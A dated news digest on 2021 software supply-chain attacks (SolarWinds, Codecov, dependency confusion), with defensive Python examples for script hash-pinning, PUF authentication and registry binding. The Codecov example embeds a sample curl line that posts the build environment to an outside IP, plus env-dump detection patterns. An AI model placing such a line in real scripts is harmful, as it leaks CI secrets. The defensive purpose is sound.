IronNet Cybersecurity released its 2021 Cybersecurity Impact Report assessing timely topics such as the estimated cost per enterprise of the SolarWinds cyber attack, executive-level engagement in attack responses, and the effect of information sharing on an organization’s overall security posture. Among the 85 percent of respondents affected by SolarWinds, nearly one-third said their organization felt a significant financial impact from the attack. In fact, the attack cost affected companies, on average, 11 percent of their annual revenue.


_______________________________________________________________________________________

(June 27, 2021)


IT companies bear brunt of new SolarWinds hacker attacks

IT companies have made up the majority of organizations targeted amid new activity by the group behind last year’s SolarWinds supply-chain attack, with at least one victim coming from Microsoft’s customer support ranks. The attack mostly targeted IT companies, which comprised 57% of total targets, followed by government (20%), and smaller percentages for non-governmental organizations and think tanks, as well as financial services.

Ref - ARNNet

_______________________________________________________________________________________

(June 26, 2021)


Microsoft says SolarWinds hackers attacked three in a new breach

Microsoft Corp. said the hackers behind the SolarWinds cyberattack recently compromised a new trio of victims using access to one of the company’s customer support agents. The hacked portal used by the individual agent contained information for a small number of customers, which the attackers used to launch a highly targeted attack.

Ref - Yahoo 

_______________________________________________________________________________________

(June 26, 2021)


Microsoft admits to signing rootkit malware in supply-chain fiasco

Microsoft has confirmed signing a malicious driver being distributed within gaming environments. This driver, called "Netfilter," is in fact a rootkit that was observed communicating with China-based command-and-control (C2) IPs while providing no legitimate functionality, which raised suspicions.


_______________________________________________________________________________________

(June 25, 2021)


The majority of large businesses caught up in supply chain attacks last year

The majority of large enterprises (64 percent) suffered a software supply chain attack last year, according to a report from security company Anchore. The report states that the use of software containers is on the rise thanks to the widespread use of DevOps processes to speed up development. This report highlights that 60 percent of respondents have made securing the software supply chain a top initiative for 2022.

Ref - ITProportal 

_______________________________________________________________________________________

(June 25, 2021)


New Nobelium activity disclosed by Microsoft

The Microsoft Threat Intelligence Center is tracking new activity from the NOBELIUM threat actor, which includes password spray and brute-force attacks. The activity was largely focused on US interests, about 45%, followed by 10% in the UK, and smaller numbers from Germany and Canada. In all, 36 countries were targeted.

Ref - Microsoft 

_______________________________________________________________________________________

(June 24, 2021)


Atlassian bugs could have led to a 1-click takeover

A supply-chain attack could have siphoned sensitive information out of Jira, such as security issues on Atlassian cloud, Bitbucket, and on-prem products. By exploiting the bug, with just one click, an attacker could have siphoned sensitive information out of Jira. The flaws could have also enabled an attacker to take over accounts and to control some of Atlassian’s applications, including Jira and Confluence.

Ref - ThreatPost 

_______________________________________________________________________________________

(June 24, 2021)


The power of anonymity in supply chain security

A large number of MSPs are managing Microsoft 365 for clients. So it’s critical that they protect Microsoft 365 with an email security solution that is integrated with Microsoft 365 via API, sitting inside Microsoft’s architecture. This architectural structure has a number of advantages, including making the solution invisible to hackers in an MX record query and allowing for internal email scanning, which can thwart lateral phishing and ransomware attacks within Microsoft 365.


_______________________________________________________________________________________

(June 24, 2021)


Shifting left with analytics to identify software supply chain anomalies

The supply chain can be compromised in part due to a lack of security monitoring and oversight for the coding and delivery of software (continuous integration/continuous delivery (CI/CD) pipelines), which creates a dangerous security gap. This gap widens because security testing does not test for changes in the software systems.

 
_______________________________________________________________________________________

(June 24, 2021)


A supply-chain breach: Taking over an Atlassian account

On November 16, 2020, Check Point Research (CPR) uncovered chained vulnerabilities that together can be used to take over an account and control some of the Atlassian apps connected through SSO. Further details about this have recently been released by Check Point. According to them, once an attacker leverages these vulnerabilities and takes over an account, they can plant backdoors for use in future supply-chain attacks.

 
_______________________________________________________________________________________

(June 23, 2021)


SUNBURST: Attack Flow, C2 Protocol, and Prevention

The SUNBURST backdoor is not yet fully understood. Spanning almost 3500 lines of code and “obfuscated” with casual naming to evade shallow review, it has many subtleties yet to be uncovered. The Cynet research team attempted to gain a better understanding of the command-and-control communication channel, its various stages, and the conditions required for execution. The main goal of this investigation is to find infected beaconing machines.

Ref - CYNet 

_______________________________________________________________________________________

(June 22, 2021)


Hackers are trying to attack big companies, and small suppliers are the weakest link

Researchers at cybersecurity company BlueVoyant examined hundreds of SMB defense company subcontractor firms. It was found that over half had severe vulnerabilities within their networks, including unsecured ports and unsupported or unpatched software, making them vulnerable to cyberattacks including data breaches and ransomware.

Ref - ZDNet 

_______________________________________________________________________________________

(June 22, 2021)


An unpatched flaw in Linux Pling Store apps could lead to supply-chain attacks

Cybersecurity researchers have disclosed a critical unpatched vulnerability affecting Pling-based free and open-source software (FOSS) marketplaces for the Linux platform that could potentially be abused to stage supply-chain attacks and achieve remote code execution (RCE).


_______________________________________________________________________________________

(June 22, 2021)


Three lessons CISOs can learn from the SolarWinds cyberattack

Here are some lessons that CISOs can learn from the SolarWinds incident to change the way they secure and manage their supply-chain infrastructure. Continuous visibility into interconnected networks, inventory management with optimal cyber hygiene, implementation of a Zero Trust model, and role-based access to privileged accounts can help minimize the risks.

 
_______________________________________________________________________________________

(June 22, 2021)


Government-mandated SBOMs to throw light on software supply chain security

An SBOM is effectively an ingredient list or a nested inventory, a formal record containing the details and supply chain relationships of various components used in building software. The EO requires NTIA to produce three proposed minimum elements that should go into any SBOM: data fields, operational considerations, and support for automation.

Ref - CSO Online 

_______________________________________________________________________________________

(June 22, 2021)


U.S. SEC probing SolarWinds clients over cyber breach disclosures

The U.S. Securities and Exchange Commission (SEC) has opened a probe into last year's SolarWinds cyber breach, focusing on whether some companies failed to disclose that they had been affected by the unprecedented hack. The SEC sent investigative letters late last week to a number of public issuers and investment firms seeking voluntary information on whether they had been victims of the hack and failed to disclose it.

Ref - Reuters 

_______________________________________________________________________________________

(June 21, 2021)


CISA doesn't know how many US federal agencies use firewalls

The Department of Homeland Security’s top cybersecurity agency doesn’t know how many agencies are segmenting their networks from unwanted outside traffic. The agency provided the answers in response to a February inquiry from Wyden’s office following a heated Senate Intelligence Committee hearing about the breach at the federal contractor SolarWinds.


_______________________________________________________________________________________

(June 21, 2021)


Attacks against container infrastructures increasing, including supply chain attacks

Hiding an attack during a CI build can succeed in most organizations’ CI environments. This attack targets supply-chain processes and could be modified to target other hidden supply chain components, processes, or even the build artifacts themselves, which can pose a severe threat.

 
_______________________________________________________________________________________

(June 21, 2021)


Lessons from the JBS attack for securing the manufacturing supply chain

There are several lessons from the JBS attack that will help manufacturing leaders secure their infrastructure. Organizations need to control access to ecosystem applications and automate identity governance. In addition, they need to strengthen authentication using Continuous Adaptive Risk and Trust (CARTA) and Zero Trust security and secure non-human identities.


_______________________________________________________________________________________

(June 21, 2021)


Software-container supply chain sees spike in attacks

Typosquatting and credential stuffing are two of the most common ways that attackers are attempting to target companies' container infrastructure and the Docker-image supply chain, with attacks climbing nearly 600% in the second half of 2020 compared with the same period a year ago.

Ref - Darkreading 

_______________________________________________________________________________________

(June 21, 2021)


SolarWinds hack could have been deterred by simple security measures

The SolarWinds hack, one of the largest cybersecurity incidents in U.S. history, may have been deterred or minimized if basic security measures had been put in place. CISA agrees that a firewall blocking all outgoing connections to the internet would have neutralized the malware.

Ref - The Hill

_______________________________________________________________________________________

(June 18, 2021)


Google dishes out homemade SLSA to thwart software supply-chain attacks

Google has proposed a framework called SLSA for dealing with supply chain attacks, a security risk exemplified by the recent compromise of the SolarWinds Orion IT monitoring platform. SLSA – short for Supply chain Levels for Software Artifacts and pronounced "salsa" for those inclined to add convenience vowels – aspires to provide security guidance and programmatic assurance to help defend the software build and deployment process.

Ref - The Register 

_______________________________________________________________________________________

(June 18, 2021)


How PAM can protect feds from third-party/service account cyber attacks

PAM solutions manage and control privileged accounts by isolating, monitoring, recording, and auditing these account sessions, commands, and actions. Third parties and service accounts cannot do their jobs a majority of the time without elevated privileges for access – thus making them a de facto part of the agency enterprise.

Ref - Meritalk

_______________________________________________________________________________________

(June 17, 2021)


Firmware security requires firm supply chain agreements

According to Bloomberg, China’s theft of technology is the biggest threat to corporate America and the US military. The Russians are experts at infiltrating the supply chain of trusted code, as witnessed by the recent SolarWinds breach, along with 20 years’ worth of cyber espionage and attacks. Organizations need to actively embed security controls before they take possession of a product.


_______________________________________________________________________________________

(June 17, 2021)


Lessons learned from the SolarWinds cyberattack and the future of NY-DFS

The New York DFS alerted DFS-regulated entities of the SolarWinds attack on December 18, 2020, through the "Supply Chain Compromise Alert." In general, DFS found that its regulated entities responded swiftly and appropriately, with 94% of impacted companies removing the systems made vulnerable by the SolarWinds hackers from their networks (and/or patching them) within three days of being notified of the attack. However, DFS noted gaps in the cybersecurity policies of several regulated entities, including irregularities in patching and patch management systems.

Ref - Mondaq 

_______________________________________________________________________________________

(June 17, 2021)


UNC2465 cybercrime group launched a supply chain attack on CCTV vendor

An affiliate of the Darkside ransomware gang, tracked as UNC2465, has conducted a supply chain attack against a CCTV vendor that distributes Dahua’s SmartPSS Windows app. UNC2465 is considered one of the main affiliates of the DARKSIDE group, along with other affiliated gangs tracked by FireEye/Mandiant as UNC2628 and UNC2659.


_______________________________________________________________________________________

(June 17, 2021)


The SolarWinds attack and its lessons

The increase in sophisticated and complex cyber-attacks like SolarWinds requires a change in the traditional security paradigm by raising the priority of cyber-security and its policies. Two types of policies have been introduced: prevention policies and problem-solving policies.


_______________________________________________________________________________________

(June 16, 2021)


Everything you need to know about SolarWinds hack

The purpose of the hack remains largely unknown. Still, there are many reasons hackers would want to get into an organization's system, including having access to future product plans or employee and customer information held for ransom. It is also not yet clear what information, if any, hackers stole from government agencies. But the level of access appears to be deep and broad.

Ref - TechTarget 

_______________________________________________________________________________________

(June 16, 2021)


Smoking out a Darkside affiliate’s supply chain software compromise

Mandiant observed DARKSIDE affiliate UNC2465 accessing at least one victim through a Trojanized software installer downloaded from a legitimate website. While this victim organization detected the intrusion, engaged Mandiant for incident response, and avoided ransomware, others may be at risk. UNC2465’s move from drive-by attacks on website visitors or phishing emails to this software supply chain attack shows a concerning shift that presents new challenges for detection. 

Ref - FireEye
 
_______________________________________________________________________________________

(June 16, 2021)


New ThroughTek IoT supply chain vulnerability announced

DHS and Nozomi Networks Labs announced a new vulnerability discovered in a ThroughTek software component that’s used broadly by many security cameras and smart device vendors. The ThroughTek component is part of the supply chain for many original equipment manufacturers (OEMs) of consumer-grade security cameras and IoT devices. ThroughTek states that its technology is used by several million Internet of Things (IoT)-connected devices.


_______________________________________________________________________________________

(June 16, 2021)


Darkside operator involved in supply chain attack via CCTV vendor’s website

A cybercrime group that used to cooperate with the Darkside ransomware gang has breached the website of a CCTV camera vendor and inserted malware (SMOKEDHAM backdoor) in a Windows application the company’s customers were using to configure and control their security feeds. The malware was hidden inside a customized version of the Dahua SmartPSS Windows app that the unnamed CCTV vendor was providing to its customers.

Ref - The Record 

_______________________________________________________________________________________

(June 16, 2021)


Supply chain attacks and vulnerability disclosures

SolarWinds, giant aviation digital services provider SITA, and DevOps tool provider Codecov are among this year's victims of supply chain attacks that continue to create a ripple effect of data breaches across their customers, exposing millions of records. The latest supply chain incident hit Edward Don and Company, a major distributor of foodservice equipment and supplies in the U.S.

Ref - ECCouncil 

_______________________________________________________________________________________

(June 16, 2021)


SolarWinds’ transparency trying to ensure others are safer

Sudhakar Ramakrishna, President and CEO of SolarWinds, shared his thoughts on the importance of continuous learning from everything, be it a bug or a cyber incident. Those lessons inform what can be done going forward to make it that much more difficult for a threat actor to carry out an attack.

Ref - Carahsoft 

_______________________________________________________________________________________

(June 14, 2021)


How to ensure third parties don't compromise the organizational supply chain

Organizations can usually count many third-party vendors in their IT environment that are vital to storing, securing, and analyzing their data. Most of the time, however, companies assess the security of these third-party products only when they are onboarded; there is no continuous security analysis or assessment. Organizations should demand a monthly security risk assessment report from all third-party vendors to learn of all known issues in their product and infrastructure.


_______________________________________________________________________________________

(June 14, 2021)


Codecov to retire the Bash script responsible for supply chain attack wave

Codecov has introduced a new uploader, built on Node.js, to replace and retire the Bash script at the center of its recent supply chain attack. The new uploader will ship as a static binary executable for Windows, Linux, Alpine Linux, and macOS. Codecov's Bash uploader was the source of a string of supply chain attacks that began around January 31, 2021, and were made public on April 15.

Ref - ZDNet 
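The practical check behind this item is that a script your pipeline fetches and executes must be pinned to a known digest, and a failed pin must be explained rather than silently tolerated. The following is an added example, not Codecov's code: it gates a fetched helper script on a pinned SHA-256 and, on mismatch, lists the lines that were added relative to a known-good copy and flags any that dump the build environment. The sample scripts, the 203.0.113.7 address and the exfiltration patterns are constructed for the example; keeping a known-good copy and its digest beside the pipeline is an assumption about your setup.

```python
"""Added example, not Codecov's code: gate a fetched CI helper script on a
pinned SHA-256 and, on mismatch, show which lines were added and whether any
of them dump the build environment.

Assumptions (not from the article): you keep a known-good copy of the script
and its digest alongside your pipeline; the sample scripts, the 203.0.113.7
address and the exfiltration patterns below are constructed for this example.
"""
import difflib
import hashlib
import hmac
import re
from typing import Dict, List

# Constructed known-good uploader (stand-in for the real script).
KNOWN_GOOD = b"""#!/bin/bash
set -e
url="https://uploader.example.invalid/v4"
echo "uploading coverage to $url"
curl -s -X POST --data-binary @coverage.xml "$url"
"""

# Constructed tampered copy: one inserted line ships the whole environment
# (CI secrets included) to an outside host, then swallows any error.
TAMPERED = KNOWN_GOOD.replace(
    b'echo "uploading',
    b'curl -s -d "$(env)" http://203.0.113.7/c || true\necho "uploading',
)

PINNED_SHA256 = hashlib.sha256(KNOWN_GOOD).hexdigest()

# Heuristic "dump the environment" constructs; extend for your CI system.
EXFIL_PATTERNS = [r"\$\(\s*env\s*\)", r"\bprintenv\b", r"/proc/self/environ"]


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_pinned(data: bytes, pinned_sha256: str) -> bool:
    """True only if the fetched bytes hash to the pinned digest."""
    return hmac.compare_digest(sha256_hex(data), pinned_sha256)


def added_lines(known_good: bytes, fetched: bytes) -> List[str]:
    """Lines present in the fetched script that are not in the known-good copy."""
    diff = difflib.unified_diff(
        known_good.decode("utf-8", "replace").splitlines(),
        fetched.decode("utf-8", "replace").splitlines(),
        lineterm="", n=0,
    )
    return [line[1:] for line in diff
            if line.startswith("+") and not line.startswith("+++")]


def flag_exfil(lines: List[str]) -> List[str]:
    """Subset of lines matching an environment-dump heuristic."""
    return [l for l in lines if any(re.search(p, l) for p in EXFIL_PATTERNS)]


def gate(fetched: bytes, pinned_sha256: str, known_good: bytes) -> Dict[str, object]:
    """Decide whether the script may run; on a pin mismatch, explain why."""
    ok = verify_pinned(fetched, pinned_sha256)
    report: Dict[str, object] = {"run": ok, "added": [], "suspicious": []}
    if not ok:
        added = added_lines(known_good, fetched)
        report["added"] = added
        report["suspicious"] = flag_exfil(added)
    return report


if __name__ == "__main__":
    for label, script in (("known-good", KNOWN_GOOD), ("tampered", TAMPERED)):
        print(label, gate(script, PINNED_SHA256, KNOWN_GOOD))
```

The digest comparison is the control; the diff and pattern scan only exist to make a failed pin actionable for whoever is paged. A static binary, as the item describes, still needs the same pin: the format of the artifact changes nothing about whether its publisher's distribution channel can be tampered with.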

_______________________________________________________________________________________

(June 13, 2021)


SolarWinds hack emboldened cyberattackers for ransomware attack spree

When a cyberattack successfully occurs on the scale of SolarWinds, history suggests hackers are emboldened to come back for more money, valuable data, and fame. The SolarWinds hackers' tactics and techniques worked so remarkably well last year that there was an incentive for them and others like them to keep going.

Ref - Yahoo 

_______________________________________________________________________________________

(June 11, 2021)


Monumental supply-chain attack on Airlines traced to APT41

A massive cyberattack on SITA, a global IT provider serving 90 percent of the world's airline industry, is slowly unfolding to reveal the largest supply chain attack in the airline industry's history. After Air India disclosed the details of its breach, it became clear that the carriers were most likely dealing with one of the biggest supply chain attacks the airline industry has seen, potentially traceable to the Chinese state-sponsored threat actor APT41.

 
_______________________________________________________________________________________

(June 10, 2021)


Mitigating third-party risks with effective cyber risk management

When it comes to cybersecurity, all sides involved in a business have to hold up their end of the bargain. A customer organization has to understand that it retains responsibility for the data it shares with third parties, and that the third parties that hold and use that data are effectively an extension of the customer's business.


_______________________________________________________________________________________

(June 10, 2021)


What SolarWinds taught enterprises about data protection

The SolarWinds breach has forced businesses worldwide to reconsider their approach to data protection and overall security. The event highlighted the level of potential devastation had the SolarWinds’ hackers chosen to encrypt the data and hold it for ransom. A recent report found the number of ransomware attacks grew by more than 150% in 2020, as cybercriminals took advantage of work-from-home vulnerabilities.


_______________________________________________________________________________________

(June 9, 2021)


Hardening the physical security supply chain to mitigate the cyber-risk

A recent report by Genetec found that 67% of physical security professionals, including Genetec's end users, integrators, and partners, are planning to prioritize their cybersecurity strategy in 2021. IP security cameras and other security devices are by their very nature connected to the internet. When not secured properly, any camera or access control device in the so-called IoT can be accessed remotely by just about anyone.

 
_______________________________________________________________________________________

(June 9, 2021)


How to stop SolarWinds-like hacks

Researchers from Ohio State University and Potomac Research LLC, led by Noeloikeau Charlot, published a paper on the use of physically unclonable functions (PUFs). At a microscopic level, even mass-produced computer chips differ slightly from one chip to the next, and a PUF turns those differences into a per-device fingerprint. For example, an online bank could check a device's PUF to make sure that only someone holding the right device is accessing an account. This could help counter attacks that bypass two-factor authentication, a technique the SolarWinds attackers used.

Ref - Nautil.us 
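The authentication pattern the item describes is challenge-response against a table of challenge-response pairs (CRPs) recorded from the device at enrollment, with each challenge used once. The following is an added example, not code from the paper: it simulates that flow, including the readout noise a real PUF exhibits and the tolerance a verifier therefore needs. The PUF itself is simulated with HMAC over a hidden per-chip secret; a real PUF derives its response from silicon variation and needs error correction, and the response width, noise level and threshold are chosen for the simulation, not taken from the paper.

```python
"""Added example; not code from the Ohio State / Potomac Research paper. It
simulates PUF-based device authentication: the verifier stores
challenge-response pairs (CRPs) at enrollment, issues each challenge once,
and accepts a response within a noise tolerance of the stored one.

Assumptions (not from the article): the PUF is simulated with HMAC over a
hidden per-chip secret plus a few flipped bits per readout; a real PUF derives
its response from silicon variation and needs error correction. RESP_BITS,
NOISE_BITS and THRESHOLD are chosen for this simulation.
"""
import hashlib
import hmac
import random
from typing import Dict

RESP_BITS = 128     # response width in bits
NOISE_BITS = 3      # bits that may flip on each readout (simulated)
THRESHOLD = 12      # max Hamming distance the verifier tolerates


class SimulatedPUF:
    """Stand-in for a PUF: a fixed hidden secret that only this "chip" has."""

    def __init__(self, seed: int):
        self._rng = random.Random(seed)
        self._secret = bytes(self._rng.getrandbits(8) for _ in range(32))

    def respond(self, challenge: bytes) -> int:
        clean = hmac.new(self._secret, challenge, hashlib.sha256).digest()[:RESP_BITS // 8]
        noisy = int.from_bytes(clean, "big")
        for _ in range(NOISE_BITS):            # simulated readout noise
            noisy ^= 1 << self._rng.randrange(RESP_BITS)
        return noisy


def hamming(a: int, b: int) -> int:
    """Number of bit positions in which a and b differ."""
    return bin(a ^ b).count("1")


class Verifier:
    """Holds enrolled CRPs; each challenge is consumed on use, so a captured
    response cannot be replayed."""

    def __init__(self) -> None:
        self._crps: Dict[str, Dict[bytes, int]] = {}

    def enroll(self, device_id: str, puf: SimulatedPUF, count: int, rng: random.Random) -> None:
        table = self._crps.setdefault(device_id, {})
        for _ in range(count):
            challenge = bytes(rng.getrandbits(8) for _ in range(16))
            table[challenge] = puf.respond(challenge)   # trusted enrollment readout

    def issue(self, device_id: str) -> bytes:
        return next(iter(self._crps[device_id]))        # an unused challenge

    def verify(self, device_id: str, challenge: bytes, response: int) -> bool:
        reference = self._crps[device_id].pop(challenge, None)  # single use
        return reference is not None and hamming(reference, response) <= THRESHOLD


def demo() -> Dict[str, bool]:
    """Genuine device passes; replaying its response fails; a clone with
    different 'silicon' fails even with a fresh challenge."""
    rng = random.Random(2021)
    genuine, clone = SimulatedPUF(seed=1), SimulatedPUF(seed=2)
    v = Verifier()
    v.enroll("dev-A", genuine, count=4, rng=rng)

    c1 = v.issue("dev-A")
    r1 = genuine.respond(c1)
    results = {"genuine": v.verify("dev-A", c1, r1)}
    results["replay"] = v.verify("dev-A", c1, r1)                 # same pair again
    c2 = v.issue("dev-A")
    results["clone"] = v.verify("dev-A", c2, clone.respond(c2))    # wrong chip
    return results


if __name__ == "__main__":
    print(demo())
```

Two design points carry over to real deployments: the verifier's CRP table is the secret-bearing asset and has to be protected accordingly, and the tolerance threshold trades false rejects from noise against false accepts from a near-miss, which is why real systems pair the PUF with error-correcting helper data rather than a bare Hamming bound.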

_______________________________________________________________________________________

(June 9, 2021)


Stealthy Gelsemium cyberspies linked to NoxPlayer supply-chain attack

ESET researchers have linked a stealthy cyberespionage group known as Gelsemium to the NoxPlayer Android emulator supply-chain attack that targeted gamers earlier this year. According to reports from G DATA and Verint Systems, the cyberspies used spear-phishing emails with document attachments exploiting the CVE-2012-0158 Microsoft Office vulnerability to deliver the malware.


_______________________________________________________________________________________

(June 8, 2021)


Protecting Industrial Control Systems against cyberattacks

ICS infrastructures are challenged to confirm the security of the supply chain for the OT system devices and sensors they rely on. There is no requirement to comply with the ISO 27001:2013 standard, which means ICS operators must often verify the security of their suppliers themselves. For multiple reasons, supply chains cannot be assumed to be a trusted channel for software delivery.


_______________________________________________________________________________________

(June 8, 2021)


The next phase of software supply chain security

The recent executive order from President Joe Biden does several important things for software supply chain security. It requires NIST to develop baseline security standards for software used by government agencies. Those standards must cover secure software development environments, including actions such as using administratively separate build environments and auditing trust relationships.


_______________________________________________________________________________________

(June 8, 2021)


The rise and rise of supply chain attacks

There are some driving forces behind the rising popularity of supply chain attacks. The cyber defenses of many high-value targets are in much better shape than before. Direct attacks against target systems may take a lot of effort and yield few results. Hence, it is more effective for cybercriminals to move up the software supply chain to exploit weak links outside their target’s cyber defenses.


 _______________________________________________________________________________________

(June 8, 2021)


Supply chain security awareness - Key risk factors

As the SolarWinds breach was underway, global supply chains elsewhere were pelted with an ongoing barrage of volatility: the COVID-19 pandemic dramatically shifted demand while pushing employees out of traditional office infrastructures and into their homes, growing trade conflicts rendered supply chain hardware and software at risk of weaponization, and significant changes in industrial regulation heaped expensive penalties and restrictions on already-stressed businesses.


_______________________________________________________________________________________

(June 7, 2021)


Defending against Software supply chain attacks: Recommendations from NIST

Given the scarcity of rapid mitigation options in the event of a software supply chain attack (the victim organization has no authority to command a timely response from its software vendor), it is far more beneficial to invest in preventive measures. Experts recommend applying a risk management lens when purchasing software and asking prospective vendors for compliance verification.


_______________________________________________________________________________________

(June 6, 2021)


Why are supply chain attacks scary?

Supply chain attacks are scary because they're really hard to deal with, and because they make it clear you're trusting a whole ecology. You're trusting every vendor whose code is on your machine, and you're trusting every vendor's vendor. The rise in supply chain attacks, Berkeley's Weaver argues, may be due in part to improved defenses against more rudimentary assaults.

 
_______________________________________________________________________________________

(June 5, 2021)


CEO of Mandiant talks about SolarWinds hack

Kevin Mandia, CEO of Mandiant, pointed out in a WSJ cybersecurity interview the ongoing attempt to define what is and is not considered cyberwar and grounds for retaliation by the U.S. government. He commented that “apparently supply chain attacks are fair game.”

Ref - Medium 

_______________________________________________________________________________________

(June 4, 2021)


Strengthening US cybersecurity: Impacts of the Executive Order

Even though the specifics of the executive order are not available today, compliance officers can start to anticipate the changes the business will need to make. First, they can expect to perform a fresh assessment of compliance risks under the new cybersecurity requirements. Second, they need to consider the new policies and procedures their business might need to implement.

Ref - JD Supra 

_______________________________________________________________________________________

(June 4, 2021)


As cyberattacks surge, Biden seeks to mount a better defense

As the cyber breaches pile up, cyber experts say it's important to note the country is facing two distinct threats. On one side is the SolarWinds attack, which was primarily an intelligence-gathering operation carried out by Russia's foreign intelligence service, the SVR, which was quietly stealing U.S. government secrets for months. On the other side is ransomware, which is surging. Russian criminal gangs are blamed for both the Colonial Pipeline attack and the hack that briefly shut down the world's largest meat supplier, JBS.

Ref - NPR

 _______________________________________________________________________________________

(June 3, 2021)


Dependency confusion: Compromising the supply chain

Researchers demonstrated that if a bad actor registers an organization's private package names on public package repositories and uploads libraries containing malicious code under those names, the malicious code can be pulled into the organization's internal applications, resulting in data exfiltration or remote code execution. The researcher details how he successfully exploited this vector to get code into the internal builds of, and earn large bug bounties from, Apple, Shopify, Microsoft, and PayPal, among others.


_______________________________________________________________________________________

(June 3, 2021)


Organizations are still wondering about Dependency Confusion attacks

In early February 2021, a dependency confusion technique abusing public registries such as npm was revealed, having been used to infiltrate major technology companies including Microsoft, Tesla, and Netflix. Although 35 companies were named, the issue affected many more, with hundreds of copycat packages appearing on the npm registry. While routing rules for internal repositories can manage some of the risk, they require manual adjustment and quickly go out of date, so automation is necessary to keep on top of this issue.

Ref - Sonatype 
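Both dependency confusion items above describe the same resolver behaviour: a client that merges a private index with a public one and takes the highest version regardless of origin. The following is an added example, not code from the research or from Sonatype: it models that merged resolution, the bound resolution that closes it (one permitted source per package, failing closed when the name is absent there), and the inventory check that lists internal names already squatted publicly. The index contents, the "acme-" prefix policy and the dotted-numeric version compare are constructed for the example; real resolvers implement full semver or PEP 440 ordering.

```python
"""Added example; not code from the research or from Sonatype. It models how
dependency confusion happens in a package resolver that merges several indexes
and how binding each package to one source closes the gap.

Assumptions (not from the article): the index contents, the "acme-" prefix for
internal packages and the dotted-numeric version compare are constructed for
this example; real resolvers implement full semver / PEP 440 ordering.
"""
from typing import Callable, Dict, List, Optional, Tuple

Index = Dict[str, List[str]]

# Constructed registries: the attacker published "acme-auth" 99.0.0 publicly,
# squatting a name that previously existed only on the private index.
PRIVATE_INDEX: Index = {"acme-auth": ["1.3.0", "1.4.0"], "acme-billing": ["2.0.1"]}
PUBLIC_INDEX: Index = {"acme-auth": ["99.0.0"], "requests": ["2.25.1"]}
INDEXES: Dict[str, Index] = {"private": PRIVATE_INDEX, "public": PUBLIC_INDEX}


def parse_version(v: str) -> Tuple[int, ...]:
    return tuple(int(part) for part in v.split("."))


def resolve_merged(name: str, indexes: Dict[str, Index]) -> Optional[Tuple[str, str]]:
    """Vulnerable behaviour: every index is consulted and the highest version
    wins whatever its origin (pip --extra-index-url and npm without a
    scope-to-registry mapping behave this way)."""
    candidates = [(parse_version(v), v, src)
                  for src, idx in indexes.items() for v in idx.get(name, [])]
    if not candidates:
        return None
    _, version, source = max(candidates)
    return version, source


def resolve_bound(name: str, indexes: Dict[str, Index],
                  source_for: Callable[[str], str]) -> Optional[Tuple[str, str]]:
    """Hardened behaviour: a policy names the single index allowed for each
    package; other indexes are never consulted for that name."""
    source = source_for(name)
    versions = indexes[source].get(name, [])
    if not versions:
        return None          # fail closed rather than fall back to another index
    return max(versions, key=parse_version), source


def acme_policy(name: str) -> str:
    """Constructed policy: the acme- prefix marks internal packages."""
    return "private" if name.startswith("acme-") else "public"


def squatted_names(private: Index, public: Index) -> List[str]:
    """Internal names that also exist publicly: confusion candidates to act on."""
    return sorted(n for n in private if n in public)


if __name__ == "__main__":
    for pkg in ("acme-auth", "acme-billing", "requests"):
        print(pkg, "merged:", resolve_merged(pkg, INDEXES),
              "bound:", resolve_bound(pkg, INDEXES, acme_policy))
    print("squatted:", squatted_names(PRIVATE_INDEX, PUBLIC_INDEX))
```

The bound resolver is the equivalent of an npm scope pinned to a registry in `.npmrc`, or a pip configuration with a single `--index-url` that proxies approved public packages; the point is that name-to-source binding must be a policy decision, never an outcome of version comparison. The `squatted_names` check is what the automation the Sonatype item calls for has to run continuously, since a name that is safe today may be registered publicly tomorrow.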

_______________________________________________________________________________________

(June 3, 2021)


Challenges with protecting the Supply Chain

To protect the supply chain, businesses should first identify their key assets, identify their partners, and determine what access those partners have to the key assets. Industry frameworks such as NIST, OWASP, and the CIS Controls all stipulate understanding where critical assets are, be they hardware, software, endpoints, or applications. However, compiling these lists is a struggle for most.

Ref - Toolbox 

_______________________________________________________________________________________

(June 3, 2021)


Japanese government agencies suffered supply chain attack exposing proprietary data

Several Japanese government agencies reportedly suffered data breaches originating from Fujitsu's "ProjectWEB" information sharing tool. Fujitsu had earlier disclosed that hackers gained unauthorized access to the system and stole customer data. Investigators said that the cyberattack affected the Japanese Ministry of Land, Infrastructure, Transport and Tourism, the Cabinet Secretariat, and Narita International Airport.

Ref - CPO Magazine 

_______________________________________________________________________________________

(June 2, 2021)


Proactive security key to combating supply chain attacks

Threat actors are becoming more sophisticated and are constantly evolving their capabilities to remain effective in their operations. To this end, organizations need to invest in the people, processes, and technology they deploy across their network in order to stand the best chance of preventing an attack. This will result in the development of capabilities and processes that will help to remediate any attacks as efficiently as possible, reducing the potential impact to both the organization and its customers.


_______________________________________________________________________________________

(June 1, 2021)


NobleBaron poisoned installers could be used in supply chain attacks

The latest wave of attacks being attributed to APT29/Nobelium threat actors includes a custom downloader that is part of a “poisoned update installer” for electronic keys used by the Ukrainian government. The latest iteration of malware activity linked to Nobelium uses a convoluted multi-stage infection chain that runs five to six layers deep. This includes the use of ‘DLL_stageless’ downloaders, called NativeZone.

Ref - SentinelOne 

_______________________________________________________________________________________

(June 1, 2021)


SolarWinds attack was an attack on trust

The SolarWinds hack last year offered some valuable insights into the true cost of a cyberattack, said Charl van der Walt, head of security research at Orange Cyberdefense, delivering one of the opening keynote addresses at the ITWeb Security Summit 2021. The impact is an attack on trust, and the consequence of this is fear, uncertainty, and doubt, which can be expensive and highly damaging.

Ref - IT Web 

_______________________________________________________________________________________

(June 1, 2021)


The U.S. seizes domains used by SolarWinds hackers

The U.S. Department of Justice (DoJ) disclosed that it intervened to take control of two command-and-control (C2) and malware distribution domains used in the recent attack campaign. The court-authorized domain seizure took place on May 28, the DoJ said, adding that the action was aimed at disrupting the threat actors' follow-on exploitation of victims and blocking their ability to compromise new systems.


_______________________________________________________________________________________

(June 1, 2021)


Defining linchpins: An industry perspective on remediating Sunburst

The Atlantic Council’s latest report “Broken Trust: Lessons from Sunburst” introduces the concept of “linchpins,” which it defines as widely used software with significant permissions ... on which every other security program or critical resource depends, and which were a key factor in the Sunburst event. The report identifies challenges to identifying, securing, and triaging this linchpin software. 

Ref - CSO Online 

_______________________________________________________________________________________

(May 31, 2021)


CISA-FBI Alert: 350 organizations targeted in attack abusing email marketing service

According to the FBI and CISA, the attackers actually sent spear-phishing emails to over 7,000 accounts at 350 organizations, including government, non-governmental and intergovernmental organizations. The initial estimates said that the attack had targeted roughly 3,000 accounts across more than 150 organizations.


_______________________________________________________________________________________

